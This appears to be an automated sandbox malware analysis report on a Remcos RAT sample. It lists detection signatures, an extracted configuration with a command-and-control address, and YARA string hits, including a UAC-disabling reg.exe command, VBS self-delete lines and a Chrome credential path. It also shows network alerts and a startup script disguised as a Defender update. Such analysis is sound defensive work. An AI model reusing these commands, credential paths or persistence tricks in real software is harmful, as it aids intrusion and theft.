Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eBHn6qHPLz.exe

Overview

General Information

Sample name:eBHn6qHPLz.exe
renamed because original name is a hash value
Original sample name:12f35a41245c2dbb16d0574d9dcc59c9.exe
Analysis ID:1562024
MD5:12f35a41245c2dbb16d0574d9dcc59c9
SHA1:4d192c491eb0f4cf477b008ec2b0798940915ee0
SHA256:9fab1939599469d96091a078e0ed884ed100cfca13fa89f2e48e9937f0e1535c
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • eBHn6qHPLz.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\eBHn6qHPLz.exe" MD5: 12F35A41245C2DBB16D0574D9DCC59C9)
    • eBHn6qHPLz.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\eBHn6qHPLz.exe" MD5: 12F35A41245C2DBB16D0574D9DCC59C9)
  • wscript.exe (PID: 7896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • defenderupdate.exe (PID: 7944 cmdline: "C:\Users\user\AppData\Roaming\defenderupdate.exe" MD5: 12F35A41245C2DBB16D0574D9DCC59C9)
      • defenderupdate.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Roaming\defenderupdate.exe" MD5: 12F35A41245C2DBB16D0574D9DCC59C9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["5.181.159.153:1151:0"], "Assigned name": "sralker", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JVWXPC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 36 entries
            SourceRuleDescriptionAuthorStrings
            0.2.eBHn6qHPLz.exe.45d4110.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              0.2.eBHn6qHPLz.exe.45d4110.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                0.2.eBHn6qHPLz.exe.45d4110.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  0.2.eBHn6qHPLz.exe.45d4110.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x69ef8:$a1: Remcos restarted by watchdog!
                  • 0x6a470:$a3: %02i:%02i:%02i:%03i
                  0.2.eBHn6qHPLz.exe.45d4110.1.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64204:$str_b2: Executing file:
                  • 0x6503c:$str_b3: GetDirectListeningPort
                  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x64b80:$str_b7: \update.vbs
                  • 0x6422c:$str_b9: Downloaded file:
                  • 0x64218:$str_b10: Downloading file:
                  • 0x642bc:$str_b12: Failed to upload file:
                  • 0x65004:$str_b13: StartForward
                  • 0x65024:$str_b14: StopForward
                  • 0x64ad8:$str_b15: fso.DeleteFile "
                  • 0x64a6c:$str_b16: On Error Resume Next
                  • 0x64b08:$str_b17: fso.DeleteFolder "
                  • 0x642ac:$str_b18: Uploaded file:
                  • 0x6426c:$str_b19: Unable to delete:
                  • 0x64aa0:$str_b20: while fso.FileExists("
                  • 0x64749:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 37 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , ProcessId: 7896, ProcessName: wscript.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs" , ProcessId: 7896, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eBHn6qHPLz.exe, ProcessId: 7336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 83 4D 78 3F CB AB 89 6C B2 F5 75 9E AC 66 D9 B0 5E B8 EB 26 9D 40 AC 34 6B 09 99 E3 34 6E 3B D4 AD B0 D9 4B 5F AB 02 37 66 C8 76 C7 06 D5 67 87 45 B5 66 31 B8 53 B8 D2 01 26 E5 9E AB EE 7B 1F 9A FB 74 D6 7F BB 4D 68 D0 4A E3 99 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\eBHn6qHPLz.exe, ProcessId: 7612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-JVWXPC\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T04:47:30.242289+010020327761Malware Command and Control Activity Detected192.168.2.4497325.181.159.1531151TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T04:47:31.620496+010020327771Malware Command and Control Activity Detected5.181.159.1531151192.168.2.449732TCP
                  2024-11-25T04:49:38.820509+010020327771Malware Command and Control Activity Detected5.181.159.1531151192.168.2.449732TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T04:47:33.808078+010028033043Unknown Traffic192.168.2.449735178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["5.181.159.153:1151:0"], "Assigned name": "sralker", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JVWXPC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeReversingLabs: Detection: 60%
                  Source: eBHn6qHPLz.exeReversingLabs: Detection: 60%
                  Source: eBHn6qHPLz.exeVirustotal: Detection: 58%Perma Link
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeJoe Sandbox ML: detected
                  Source: eBHn6qHPLz.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_0043293A
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c3920868-8

                  Exploits

                  barindex
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406764 _wcslen,CoGetObject,9_2_00406764
                  Source: eBHn6qHPLz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpFile created: C:\Users\user\AppData\Local\Temp\Setup Log 2024-11-24 #001.txtJump to behavior
                  Source: eBHn6qHPLz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: b{app}/Engine\Binaries\Win64\CrashReportClient.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000003.1857499053.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: eBHn6qHPLz.exe, 00000000.00000002.1892169494.0000000007287000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1925160227.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.000000000457D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 1{app}/Engine\Binaries\Win64\CrashReportClient.pdb`Ex source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002775000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: eBHn6qHPLz.exe, 00000000.00000002.1892169494.0000000007287000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1925160227.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.000000000457D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ebefore_install('1beb46cfc001e87fea83dc90c12cc9b3', 'Engine\Binaries\Win64\CrashReportClient.pdb', 16)_w source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002775000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: F{app}/Engine\Binaries\Win64\tbb.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000003.1857499053.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: #{app}/Engine\Binaries\Win64\tbb.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3559707328.0000000003710000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Vbefore_install('e7feb7079e7c0eff2bb1598dd7f7026e', 'Engine\Binaries\Win64\tbb.pdb', 1) source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.000000000278B000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040B335
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,9_2_0041B42F
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040B53A
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,9_2_004089A9
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406AC2 FindFirstFileW,FindNextFileW,9_2_00406AC2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,9_2_00407A8C
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00418C69
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,9_2_00408DA7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406F06
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B95648h0_2_04B95470
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B95648h0_2_04B95461
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B9B0E4h0_2_04B9B1E9
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B950AFh0_2_04B94D30
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B950AFh0_2_04B94D20
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B9B0E4h0_2_04B9AE28
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 4x nop then jmp 04B9B0E4h0_2_04B9AE18
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A7B0E4h8_2_06A7AE28
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A7B0E4h8_2_06A7AE18
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A75648h8_2_06A75470
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A750AFh8_2_06A74D20
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A750AFh8_2_06A74D30
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A75648h8_2_06A753D8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 4x nop then jmp 06A7B0E4h8_2_06A7B1E9

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 5.181.159.153:1151
                  Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 5.181.159.153:1151 -> 192.168.2.4:49732
                  Source: Malware configuration extractorIPs: 5.181.159.153
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 5.181.159.153:1151
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49735 -> 178.237.33.50:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.153
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004260F7 recv,9_2_004260F7
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmp, defenderupdate.exeString found in binary or memory: http://geoplugin.net/json.gp
